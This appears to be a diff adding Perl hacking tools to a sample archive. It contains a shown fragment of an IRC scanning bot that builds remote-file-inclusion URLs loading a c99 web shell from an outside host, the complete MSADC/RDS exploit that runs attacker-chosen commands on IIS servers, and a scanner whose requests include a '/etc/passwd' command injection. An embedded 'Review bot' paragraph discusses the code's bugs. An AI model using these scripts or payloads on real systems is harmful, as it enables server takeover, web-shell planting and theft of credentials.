stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] All-The-Web ".scalar(@allist)." Situs!12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Ask ".scalar(@asklist)." Situs!12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] UoL ".scalar(@uollist)." Situs!12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] AoL ".scalar(@aollist)." Situs!12::.");
push(my @tot, @glist, @ylist, @mlist, @alist, @llist, @allist,@asklist,@uollist,@aollist);
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] 12Total Scan 9,1H1,9e9,1n1,9C9,1a ".scalar(@tot)." Situs!12::.");
my @puliti=&unici(@tot);
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] 7Total Pencarian 9,1H1,9e9,1n1,9C9,1a ".scalar(@puliti)." Situs!12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Vulnerability 9,1H1,9e9,1n1,9C9,1a Scan!12::.");
my $uni=scalar(@puliti);
foreach my $sito (@puliti)
{
$contatore++;
if ($contatore %30==0){
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Injek<65> cinta ".$contatore." dari ".$uni. " situs12::.");
}
if ($contatore==$uni-1){
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Selasai [13Dork] $dork12::.");
}
my $test="http://".$sito.$bug.$cmd."?";
my $print="http://".$sito.$bug."http://by-gardenfox.t35.com/c99.txt"."?";
my $req=HTTP::Request->new(GET=>$test);
my $ua=LWP::UserAgent->new();
$ua->timeout(5);
my $response=$ua->request($req);
if ($response->is_success) {
my $re=$response->content;
if($re =~ /Mic22/ && $re =~ /uid=/){
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space)=split(/\,/,$x);
stampa($sk, "PRIVMSG $canale :12.::[13Safe(12 OFF ) 4Sys(7 $type ) 6Free(14 $space )] $print12::.");
stampa($sk, "PRIVMSG MoKu :13.::[12Safe(4 OFF ) 7Sys(6 $type ) 14Free(6 $space )] $print12::.");
}}
elsif($re =~ /Mic22/)
{
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space)=split(/\,/,$x);
stampa($sk, "PRIVMSG $canale :12.::[2Safe(4 ON ) 6Sys(7 $type ) 7Free(6 $space )] $print12::.");
}}
}}}
exit;
}}}
sub stampa()
{
if ($#_ == '1') {
my $sk = $_[0];
print $sk "$_[1]\n";
} else {
print $sk "$_[0]\n";
}}
sub os(){
my $sito=$_[0];
my $Res=query($sito);
my $type;
my $free;
my $str;
while($Res=~m/<br>OSTYPE:(.+?)\<br>/g){
$type=$1;
}
while($Res=~m/<br>Free:(.+?)\<br>/g){
$free=$1;
}
$str=$type.",".$free;
return $str;
}
sub aol(){
my @lst;
my $key = $_[0];
for($b=1;$b<=100;$b++){
my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
my $Res=query($AoL);
while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}
sub google(){
my @lst;
my $key = $_[0];
for($b=0;$b<=1000;$b+=100){
my $Go=("http://www.google.co.id/search?hl=id&q=".key($key)."&num=100&filter=0&start=".$b);
my $Res=query($Go);
while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}
sub yahoo(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=100){
my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b);
my $Res=query($Ya);
while($Res =~ m/\<em class=yschurl>(.+?)\<\/em>/g){
my $k=$1;
$k=~s/<b>//g;
$k=~s/<\/b>//g;
$k=~s/<wbr>//g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}
sub altavista(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
my $Res=query($AlT);
while($Res=~m/<span class=ngrn>(.+?)\//g){
if($1 !~ /altavista/){
my $k=$1;
$k=~s/<//g;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}
sub msn(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE");
my $Res=query($MsN);
while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if($1 !~ /msn|live/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}
sub libero(){
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0,$pg=0; $i<=1000; $i+=10,$pg++)
{
my $Lib=("http://arianna.libero.it/search/abin/integrata.cgi?s=1&pag=".$pg."&start=".$i."&query=".key($key));
my $Res=query($Lib);
while($Res =~ m/<a class=\"testoblu\" href=\"?http:\/\/([^>\"]*)\//g){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}
sub ask(){
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=10)
{
my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
my $Res=query($Ask);
while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
my $k=$3;
$k=~s/[\"\ ]//g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}
sub alltheweb()
{
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=100)
{
my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
my $Res=query($all);
while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
my $k=$1;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}
sub uol(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i);
my $Res=query($UoL);
while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){
my $k=$1;
if($k!~/busca|uol|yahoo/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}
sub links()
{
my @l;
my $link=$_[0];
my $host=$_[0];
my $hdir=$_[0];
$hdir=~s/(.*)\/[^\/]*$/\1/;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host.="/";
$link.="/";
$hdir.="/";
$host=~s/\/\//\//g;
$hdir=~s/\/\//\//g;
$link=~s/\/\//\//g;
push(@l,$link,$host,$hdir);
return @l;
}
sub geths(){
my $host=$_[0];
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
return $host;
}
sub key(){
my $chiave=$_[0];
$chiave =~ s/ /\+/g;
$chiave =~ s/:/\%3A/g;
$chiave =~ s/\//\%2F/g;
$chiave =~ s/&/\%26/g;
$chiave =~ s/\"/\%22/g;
$chiave =~ s/,/\%2C/g;
$chiave =~ s/\\/\%5C/g;
return $chiave;
}
sub query($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href=\"?http:\/\///;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query=~s/$host//;
if ($query eq "") {$query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}
sub unici{
my @unici = ();
my %visti = ();
foreach my $elemento ( @_ )
{
next if $visti{ $elemento }++;
push @unici, $elemento;
}
return @unici;
}

517
Perl/HackTool.Perl.Mdctr Normal file

@ -0,0 +1,517 @@
#
# MSADC/RDS 'usage' (aka exploit) script version 2
#
# by rain forest puppy
#
# - added UNC support, really didn't clean up code, but oh well
use Socket; use Getopt::Std;
getopts("e:vd:h:XRVNwcu:s:", \%args);
print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n";
if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\\\\host\\share\\file> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>
Or a -R will resume a (v2) command session
~; exit;}
###########################################################
# config data
@drives=("c","d","e","f","g","h");
@sysdirs=("winnt","winnt35","winnt351","win","windows");
# we want 'wicca' first, because if step 2 made the DSN, it's ready to go
@dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
"banner", "banners", "ads", "ADCDemo", "ADCTest");
# this is sparse, because I don't know of many
@sysmdbs=( "\\catroot\\icatalog.mdb",
"\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\certmdb.mdb",
"\\system32\\ias\\ias.mdb",
"\\system32\\ias\\dnary.mdb",
"\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%
@mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
"\\cfusion\\cfapps\\forums\\forums_.mdb",
"\\cfusion\\cfapps\\forums\\data\\forums.mdb",
"\\cfusion\\cfapps\\security\\realm_.mdb",
"\\cfusion\\cfapps\\security\\data\\realm.mdb",
"\\cfusion\\database\\cfexamples.mdb",
"\\cfusion\\database\\cfsnippets.mdb",
"\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
"\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
"\\cfusion\\brighttiger\\database\\cleam.mdb",
"\\cfusion\\database\\smpolicy.mdb",
"\\cfusion\\database\cypress.mdb",
"\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
"\\website\\cgi-win\\dbsample.mdb",
"\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
); #these are just \
###########################################################
$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $target= inet_aton($ip)
|| die("inet_aton problems; host doesn't exist?");}
if (!defined $args{R}){ $ret = &has_msadc; }
if (defined $args{X}) { &hork_idx; exit; }
if (defined $args{N}) { &get_name; exit; }
if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
if (defined $args{R}) { &load; exit; }
print "Type the command line you want to run ($comm assumed):\n"
. "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;
if (!defined $args{s} || $args{s}==1){
print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
&try_btcustmr;}
if (!defined $args{s} || $args{s}==2){
print "\nStep 2: Trying to make our own DSN...";
if (&make_dsn){ print "<<success>>\n"; sleep(3); } else {
print "<<fail>>\n"; }} # we need to sleep to let the server catchup
if (!defined $args{s} || $args{s}==3){
print "\nStep 3: Trying known DSNs...";
&known_dsn;}
if (!defined $args{s} || $args{s}==4){
print "\nStep 4: Trying known .mdbs...";
&known_mdb;}
if (!defined $args{s} || $args{s}==5){
if (defined $args{u}){
print "\xStep 5: Trying UNC...";
&use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }}
if (!defined $args{s} || $args{s}==6){
if (defined $args{e}){
print "\nStep 6: Trying dictionary of DSN names...";
&dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }}
print "\n\nNo luck, guess you'll have to use a real hack, eh?\n";
exit;
##############################################################################
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
open(OUT,">raw.out"); my @in;
select(S); $|=1; print $pstr;
while(<S>){ print OUT $_; push @in, $_;
print STDOUT "." if(defined $args{X});}
close(OUT); select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }}
##############################################################################
sub make_header { # make the HTTP request
my $aa, $bb;
if (defined $args{V}){
$aa="VbBusObj.VbBusObjCls.GetRecordset";
$bb="2";
} else {
$aa="AdvancedDataFactory.Query";
$bb="3";}
$msadc=<<EOT
POST /msadc/msadcs.dll/$aa HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: $clen
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb
--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen
EOT
;
$msadc=~s/\n/\r\n/g;
return $msadc;}
##############################################################################
sub make_req { # make the RDS request
my ($switch, $p1, $p2)=@_;
my $req=""; my $t1, $t2, $query, $dsn;
if ($switch==1){ # this is the btcustmr.mdb query
$query="Select * from Customers where City='|shell(\"$command\")|'";
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}
elsif ($switch==2){ # this is general make table query
$query="create table AZZ (B int, C varchar(10))";
$dsn="$p1";}
elsif ($switch==3){ # this is general exploit table query
$query="select * from AZZ where C='|shell(\"$command\")|'";
$dsn="$p1";}
elsif ($switch==4){ # attempt to hork file info from index server
$query="select path from scope()";
$dsn="Provider=MSIDXS;";}
elsif ($switch==5){ # bad query
$query="select";
$dsn="$p1";}
elsif ($switch==6){ # this is table-independant query (new)
$query="select * from MSysModules where name='|shell(\"$command\")|'";
$dsn="$p1";}
$t1= make_unicode($query);
$t2= make_unicode($dsn);
if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; }
$req.= "\x08\x00" . pack ("S1", length($t1));
$req.= "\x00\x00" . $t1 ;
$req.= "\x08\x00" . pack ("S1", length($t2));
$req.= "\x00\x00" . $t2 ;
$req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
return $req;}
##############################################################################
sub make_unicode { # quick little function to convert to unicode
my ($in)=@_; my $out;
for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
return $out;}
##############################################################################
sub rdo_success { # checks for RDO return success (this is kludge)
my (@in) = @_; my $base=content_start(@in);
if($in[$base]=~/multipart\/mixed/){
return 1 if( $in[$base+10]=~/^\x09\x00/ );}
return 0;}
##############################################################################
sub make_dsn { # this (tries to) make a DSN for us
print "\nMaking DSN: ";
foreach $drive (@drives) {
print "$drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
"Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq="
. $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
return 0 if $2 eq "404"; # not found/doesn't exist
if($2 eq "200") {
foreach $line (@results) {
return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}}
} return 0;}
##############################################################################
sub verify_exists {
my ($page)=@_;
my @results=sendraw("GET $page HTTP/1.0\n\n");
return $results[0];}
##############################################################################
sub try_btcustmr {
foreach $dir (@sysdirs) {
print "$dir -> "; # fun status so you can see progress
foreach $drive (@drives) {
print "$drive: "; # ditto
$reqlen=length( make_req(1,$drive,$dir) ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(1,$drive,$dir));
if (rdo_success(@results)){print "Success!\n";
save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;");
exit;}
else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}}
##############################################################################
sub odbc_error {
my (@in)=@_; my $base;
my $base = content_start(@in);
if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
$in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
return $in[$base+4].$in[$base+5].$in[$base+6];}
print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n";
print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
$in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}
##############################################################################
sub verbose {
my ($in)=@_;
return if !$verbose;
print STDOUT "\n$in\n";}
##############################################################################
sub save {
my ($p1)=@_; my $ropt="";
open(OUT, ">rds.save") || print "Problem saving parameters...\n";
if (defined $args{c}){ $ropt="c ";}
if (defined $args{V}){ $ropt.="V ";}
if (defined $args{w}){ $ropt.="w ";}
print OUT "v2\n$ip\n$ropt\n$p1\n";
close OUT;}
##############################################################################
sub load {
my ($action)=@_;
my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};";
open(IN,"<rds.save") || die("Couldn't open rds.save\n");
@p=<IN>; close(IN);
die("Wrong rds.save version") if $p[0] ne "v2\n";
$ip="$p[1]"; $ip=~s/\n//g;
$target= inet_aton($ip) || die("inet_aton problems");
print "Resuming to $ip ...";
@switches=split(/ /,$p[2]);
foreach $switch (@switches) {
$args{$switch}="1";}
if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
print "Type the command line you want to run ($comm assumed):\n"
. "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;
$torun="$p[3]"; $torun=~s/\n//g;
if($torun=~/btcustmr/){
$args{'c'}="1";} # this is a kludge to make it work
if($torun=~/^dbq/){ $torun=$drvst.$torun; }
if(run_query("$torun")){
print "Success!\n";} else { print "failed\n"; }
exit;}
##############################################################################
sub create_table {
return 1 if (!defined $args{c});
return 1 if (defined $args{V});
my ($in)=@_;
$reqlen=length( make_req(2,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(2,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 1 if $temp=~/Table 'AZZ' already exists/;
return 0;}
##############################################################################
sub known_dsn {
foreach $dSn (@dsns) {
print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
if(run_query("DSN=$dSn")){
print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";}
##############################################################################
sub is_access {
my ($in)=@_;
return 1 if (!defined $args{c});
return 1 if (defined $args{V});
$reqlen=length( make_req(5,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(5,$in,""));
my $temp= odbc_error(@results);
verbose($temp); return 1 if ($temp=~/Microsoft Access/);
return 0;}
##############################################################################
sub run_query {
my ($in)=@_; my $req;
if (defined $args{c}){$req=3;} else {$req=6;}
$reqlen=length( make_req($req,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req($req,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 0;}
##############################################################################
sub known_mdb {
my @drives=("c","d","e","f","g");
my @dirs=("winnt","winnt35","winnt351","win","windows");
my $dir, $drive, $mdb;
my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";
foreach $drive (@drives) {
foreach $dir (@sysdirs){
foreach $mdb (@sysmdbs) {
print ".";
if(create_table($drv.$drive.":\\".$dir.$mdb)){
if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
print "$mdb: Success!\n"; save ("dbq=".$drive .":\\".$dir.$mdb); exit;
}}}}}
foreach $drive (@drives) {
foreach $mdb (@mdbs) {
print ".";
if(create_table($drv.$drive.":".$mdb)){
if(run_query($drv.$drive.":".$mdb)){
print "$mdb: Success!\n"; save ("dbq=".$drive.":".$mdb); exit;
}}}}
}
##############################################################################
sub hork_idx {
print "\nAttempting to dump Index Server tables...\n";
print " NOTE: Sometimes this takes a while, other times it stalls\n\n";
$reqlen=length( make_req(4,"","") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(4,"",""));
if (rdo_success(@results)){
my $max=@results; my $c; my %d;
for($c=19; $c<$max; $c++){
$results[$c]=~s/\x00//g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
$results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
$d{"$1$2"}="";}
foreach $c (keys %d){ print "$c\n"; }
} else {print "Index server not installed/query failed\n"; }}
##############################################################################
sub dsn_dict {
open(IN, "<$args{e}") || die("Can't open external dictionary\n");
while(<IN>){
$hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
if(run_query("DSN=$dSn")){
print "Success!\n"; save ("dsn=$dSn"); exit; }}}
print "\n"; close(IN);}
##############################################################################
sub content_start { # this will take in the server headers
my (@in)=@_; my $c;
for ($c=1;$c<500;$c++) { # assume there's less than 500 headers
if($in[$c] =~/^\x0d\x0a/){
if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
else { return $c+1; }}}
return -1;} # it should never get here actually
##############################################################################
sub funky {
my (@in)=@_; my $error=odbc_error(@in);
if($error=~/ADO could not find the specified provider/){
print "\nServer returned an ADO miscofiguration message\nAborting.\n";
exit;}
if($error=~/A Handler is required/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}
if($error=~/specified Handler has denied Access/){
print "\nADO handlers denied access (they most likely are patched)\n";
exit;}
if($error=~/server has denied access/){
print "\nADO handlers denied access (they most likely are patched)\n";
exit;}}
##############################################################################
sub has_msadc {
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
my $base=content_start(@results);
return if($results[$base]=~/Content-Type: application\/x-varg/);
my @s=grep("^Server:",@results);
if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n$s[0]\n" }
else { print "/msadc/msadcs.dll was not found.\n";}
exit;}
##############################################################################
sub use_unc {
$uncpath=$args{u};
$driverline="driver={Microsoft Access Driver (*.mdb)};dbq=";
if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){
print "Your UNC path sucks. You need the following format:\n".
"\\server(ip preferable)\share\some-file.mdb\n\n"; exit; }
if(create_table($driverline.$uncpath)){
if(run_query($driverline.$uncpath)){
print "Success!\n"; save ("dbq=".$uncpath); exit;}}
}
##############################################################################
sub get_name { # this was added last minute
my $msadc=<<EOT
POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: 126
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0
--!ADM!ROX!YOUR!WORLD!--
EOT
; $msadc=~s/\n/\r\n/g;
my @results=sendraw($msadc);
my $base=content_start(@results);
$results[$base+6]=~s/[^-A-Za-z0-9!\@\#\$\%^\&*()\[\]_=+~<>.,?]//g;
print "Machine name: $results[$base+6]\n";}
##############################################################################
# special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm,
# #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and
# good friends!), wiretrip, l0pht, nmrc & all of phrack
#
# thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
#
# I wish I could really name everyone, but I can't. Don't feel slighted if
# your not on the list... :)
##############################################################################
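Review bot: The comma-list declarations `my $aa, $bb;` in make_header, `my $t1, $t2, $query, $dsn;` in make_req and `my $dir, $drive, $mdb;` in known_mdb only make the first name lexical, the rest stay package globals, and in odbc_error `my $base;` is immediately redeclared by `my $base = content_start(@in);`. Two of the step messages are also never shown: `"\nNo -u; Step 5 skipped.\n";` and `"\nNo -e; Step 6 skipped.\n";` are bare strings in void context with no `print`, and `print "\xStep 5: Trying UNC...";` uses `\x` with no hex digits, which yields a NUL byte rather than the `\n` the other steps use. The UNC-format check in use_unc, `if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/)`, applies `!` to `$uncpath` before the match because `!` binds tighter than `=~`, so the format is never actually validated. As this is an archived historical sample rather than maintained code, I would leave the bytes alone and record these in a comment above the existing header block, e.g. `# Archive note: declarations of the form my $a, $b; leave later names global; the two "Step N skipped" strings are never printed; use_unc's format check is a precedence bug and does not validate its input.`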

210
Perl/HackTool.Perl.Nrgscan Normal file

@ -0,0 +1,210 @@
@scripts_w = ("GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0\n\n",
"GET /_vti_bin/shtml.dll HTTP/1.0\n\n",
"GET /article.php HTTP/1.0\n\n",
"GET /_vti_bin/shtml.exe HTTP/1.0\n\n",
"GET /msadc/samples/adctest.asp HTTP/1.0\n\n");
@names_w = ("/cgi-bin",
"/_vti_bin",
"/article",
"/_vti_bin",
"/Webdist",
"/msadc.pl",
"/RDS");
######### Fast Scan - script must be edited in sub version if it is to be used ##########
@scripts_u = ("GET /_vti_inf.html HTTP/1.0\n\n","GET /_vti_pvt/service.pwd HTTP/1.0\n\n",
"GET /_vti_pvt/users.pwd HTTP/1.0\n\n","GET /_vti_pvt/authors.pwd HTTP/1.0\n\n",
"GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n","GET /_vti_bin/shtml.dll HTTP/1.0\n\n",
"GET /_vti_bin/shtml.exe HTTP/1.0\n\n","GET /cgi-dos/args.bat HTTP/1.0\n\n",
"GET /cgi-win/uploader.exe HTTP/1.0\n\n","GET /cgi-bin/rguest.exe HTTP/1.0\n\n",
"GET /cgi-bin/wguest.exe HTTP/1.0\n\n","GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n",
"GET /scripts/CGImail.exe HTTP/1.0\n\n","GET /scripts/tools/newdsn.exe HTTP/1.0\n\n",
"GET /scripts/fpcount.exe HTTP/1.0\n\n","GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n",
"GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n","GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n",
"GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n","GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n",
"GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n","GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n",
"GET /search97.vts HTTP/1.0\n\n","GET /carbo.dll HTTP/1.0\n\n");
@names_u = ("_vti_inf.html ","service.pwd ","users.pwd ","authors.pwd ","administrators ",
"shtml.dll ","shtml.exe ","args.bat ","uploader.exe ","rguest.exe ",
"wguest.exe ","bdir - samples ","CGImail.exe ","newdsn.exe ","fpcount.exe ",
"openfile.cfm ","exprcalc.cfm ","dispopenedfile ","sendmail.cfm ","codebrws.asp ",
"codebrws.asp 2 ","showcode.asp ","search97.vts ","carbo.dll ");
############################# Above code not used ###########################################
###############################################################
$insecure = 0;
system "clear";
print "\n Energy PHP Fast Scanner \n\n";
use IO::Socket;
my ($port, $sock,$server);
$size=0;
################################ SCAN ##########################
if(! $ARGV[0])
{
&usage;
exit;
}
$port = $ARGV[2];
if(! $ARGV[2]) { $port = 80; }
open (HOSTFILE, "$ARGV[0]");
@hostfile = <HOSTFILE>;
chop(@hostfile);
$hostlength = @hostfile;
$hostcount = 0;
while ($hostcount < $hostlength) {
print ("working on @hostfile[$hostcount]...\n");
$server = (@hostfile[$hostcount]);
&connect;
$hostcount++;
}
print "Scanner dropper \n";
##########################################################
sub connect {
#print "[Trying $server]\n";
$sock = IO::Socket::INET->new(PeerAddr => $server,
PeerPort => $port,
Proto => 'tcp');
if ($sock) {
print "[Connected to $server on $port]\n";
$n=0;
&version;
close(sock);
$size++;
} else {
}
}
###########################################################
sub version {
$ver = "HEAD / HTTP/1.0\n\n";
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($server) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!";
connect(SOCK, $paddr) || die "Error: $!";
send(SOCK, $ver, 0) || die "Can't to send packet: $!";
# I do believe this should be taken out-------------------------
# However unhash below to activate interactive optional deep mode.
# print "[Server version is]:\n[##############################]\n";
# while(<SOCK>)
# {
# print;
# }
# print "[##############################]\n";
